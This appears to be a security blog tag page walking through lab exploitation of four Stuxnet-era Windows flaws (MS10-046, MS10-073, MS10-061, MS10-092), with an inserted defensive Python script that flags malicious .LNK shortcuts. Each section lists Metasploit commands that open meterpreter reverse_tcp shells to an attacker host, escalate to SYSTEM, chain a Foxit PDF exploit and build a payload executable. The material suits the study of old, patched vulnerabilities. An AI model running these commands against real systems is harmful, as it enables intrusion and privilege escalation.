Tag Archives: Stuxnet

MS10-046 : Microsoft Windows Shell LNK Execution

Timeline :

Vulnerability discovered being exploited in the wild as part of the Stuxnet worm
Metasploit PoC provided on 2010-07-19

PoC provided by :

hdmoore
jduck
B_H

Reference(s) :

CVE-2010-2568
MS10-046

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 Edition SP1 and Windows Vista x64 Edition SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

Tested on Windows XP SP3

Description :

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
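As an added defender-side example (not part of the original post or of the Metasploit module), the script below parses the MS-SHLLINK header, the LinkTargetIDList and the IconLocation string of a .LNK file and flags the traits the description above mentions: an icon resource resolved through a UNC path, or a DLL/CPL path embedded in the target ID list. The sample shortcuts and the 192.0.2.10 address are constructed test data.

```python
import struct
# ShellLinkHeader starts with HeaderSize 0x4C and the Shell Link CLSID 00021401-0000-0000-C000-000000000046
LNK_MAGIC = b"\x4c\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
# LinkFlags bits 0..7 (MS-SHLLINK): IDList, LinkInfo, Name, RelativePath, WorkingDir, Arguments, IconLocation, IsUnicode
F_IDLIST, F_LINKINFO, F_NAME, F_RELPATH, F_WORKDIR, F_ARGS, F_ICON, F_UNICODE = (1 << i for i in range(8))

def parse_lnk(data):
    """Return (LinkFlags, raw LinkTargetIDList bytes, IconLocation string) from a .LNK blob."""
    if data[:20] != LNK_MAGIC:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos, idlist, icon = 0x4C, b"", ""
    if flags & F_IDLIST:                       # IDListSize, then ItemIDs ending with a 2-byte TerminalID
        size = struct.unpack_from("<H", data, pos)[0]
        idlist, pos = data[pos + 2:pos + 2 + size], pos + 2 + size
    if flags & F_LINKINFO:                     # LinkInfoSize is its first field: skip the whole structure
        pos += struct.unpack_from("<I", data, pos)[0]
    for bit in (F_NAME, F_RELPATH, F_WORKDIR, F_ARGS, F_ICON):   # StringData blocks come in this fixed order
        if flags & bit:                        # CountCharacters, then the characters (UTF-16LE if IsUnicode)
            n = struct.unpack_from("<H", data, pos)[0] * (2 if flags & F_UNICODE else 1)
            text = data[pos + 2:pos + 2 + n].decode("utf-16-le" if flags & F_UNICODE else "latin-1")
            pos, icon = pos + 2 + n, (text if bit == F_ICON else icon)
    return flags, idlist, icon

def suspicious_lnk(data):
    """Heuristic triage: reasons a shortcut looks like an MS10-046 lure; an empty list means nothing flagged."""
    _, idlist, icon = parse_lnk(data)
    reasons, low = [], idlist.lower()
    def found(s):                              # s as ANSI or UTF-16LE anywhere inside the raw ItemIDs
        return s.encode() in low or s.encode("utf-16-le") in low
    if icon.startswith("\\\\") or found("\\\\"):
        reasons.append("icon is resolved over a UNC path (IconLocation or LinkTargetIDList)")
    if found(".dll") or found(".cpl"):
        reasons.append("LinkTargetIDList embeds a .dll/.cpl path (the shell loads it to render the icon)")
    return reasons

def build_lnk(icon="", target_path=""):
    """Constructed fixture, not a real sample: minimal .LNK with optional IconLocation and a one-item IDList."""
    item = target_path.encode("utf-16-le")
    idlist = struct.pack("<H", len(item) + 2) + item if item else b""   # ItemID: size (incl. itself) + data
    flags = F_UNICODE | (F_ICON if icon else 0) | (F_IDLIST if idlist else 0)
    lnk = LNK_MAGIC + struct.pack("<I", flags) + b"\x00" * (0x4C - 24)  # rest of the 0x4C-byte header zeroed
    if idlist:
        lnk += struct.pack("<H", len(idlist) + 2) + idlist + b"\x00\x00"
    if icon:
        lnk += struct.pack("<H", len(icon)) + icon.encode("utf-16-le")
    return lnk

BENIGN = build_lnk(icon="%SystemRoot%\\system32\\shell32.dll")     # ordinary shortcut icon
LURE = build_lnk(target_path="\\\\192.0.2.10\\share\\icon.dll")     # Stuxnet-style: DLL reached over UNC
```

Run `suspicious_lnk(open(path, "rb").read())` over shortcuts harvested from removable media or WebDAV caches; anything returning a non-empty list deserves a closer look.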

Commands :

use windows/browser/ms10_046_shortcut_icon_dllloader
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-073 : Microsoft Windows Keyboard Layout Privilege Escalation

Timeline :

Vulnerability disclosed by Microsoft on 2010-10-12
Microsoft patch "KB981957" provided on 2010-10-12
Exploit-DB PoC provided by Ruben Santamarta on 2011-01-13
Metasploit PoC provided by jduck on 2011-01-17

PoC provided by :

Ruben Santamarta
jduck

Reference(s) :

CVE-2010-2743
MS10-073

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 Edition SP1 and Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit SP2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based SP2
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems

Tested on Windows XP SP3

Description :

This module exploits the keyboard layout 0day exploited by Stuxnet. When processing specially crafted keyboard layout files (DLLs), the Windows kernel fails to validate that an array index is within the bounds of the array. By loading a specially crafted keyboard layout, an attacker can execute code in Ring 0.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
ifconfig
set LHOST 192.168.178.21
exploit -j

sessions
sessions -i 1
getuid
getsystem
ps
migrate xxxx
background

use post/windows/escalate/ms10_073_kbdlayout
info
show options
set SESSION 1
exploit

sessions -i 1
getuid
getsystem
shell

MS10-061 : Microsoft Print Spooler Service Impersonation Vulnerability

Timeline :

Vulnerability exploited by the Stuxnet worm
Security update released by Microsoft (KB2347290) on 2010-09-14
Metasploit PoC released on 2010-09-17

PoC provided by :

jduck
hdm

Reference(s) :

CVE-2010-2729
MS10-061

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

Tested on Windows XP SP3

Description :

This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes an EXE and then (ab)uses the impersonation vulnerability a second time to create a secondary RPC connection to the \PIPE\ATSVC named pipe. We then proceed to create a remote AT job using a blind NetrJobAdd RPC call.

Commands :

use exploit/windows/smb/ms10_061_spoolss
nmap 192.168.178.41
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig

MS10-092 : Microsoft Windows Task Scheduler Privilege Escalation

Timeline :

webDEViL 0day released on Exploit-DB on 2010-11-20
Metasploit exploit released on 2010-11-20

PoC provided by :

webDEViL
jduck

Reference(s) :

CVE-2010-3338
EDB-ID-15589
MS10-092

Affected version(s) :

Should work on Vista/Win7/2008 x86/x64

Tested on Windows 7 Ultimate (French "Intégrale" edition)

Description :

Stuxnet is not buried yet: of the four 0days it used, only three were patched by Microsoft on October's Patch Tuesday. The last one was revealed by webDEViL on 21 October on Exploit-DB, and one day later this still unpatched 0day was integrated into Metasploit by the Rapid7 team.

This vulnerability lets a local unprivileged user perform a privilege escalation attack through the Windows Task Scheduler on Windows Vista, 7 and 2008.

Below is a video demonstrating the privilege escalation chained with another 0day in Foxit PDF Reader disclosed by the Corelan Team.

Commands :

Foxit PDF Reader exploitation

use exploit/windows/fileformat/foxit_title_bof
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sysinfo
getuid
getprivs

Creating a test.exe containing a reverse_tcp meterpreter payload

sudo msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.178.21 X test.exe

Launching a second multi handler listener with msfcli

sudo msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.178.21 E

Running schelevator to gain system privileges

run schelevator -u test.exe

getuid
getprivs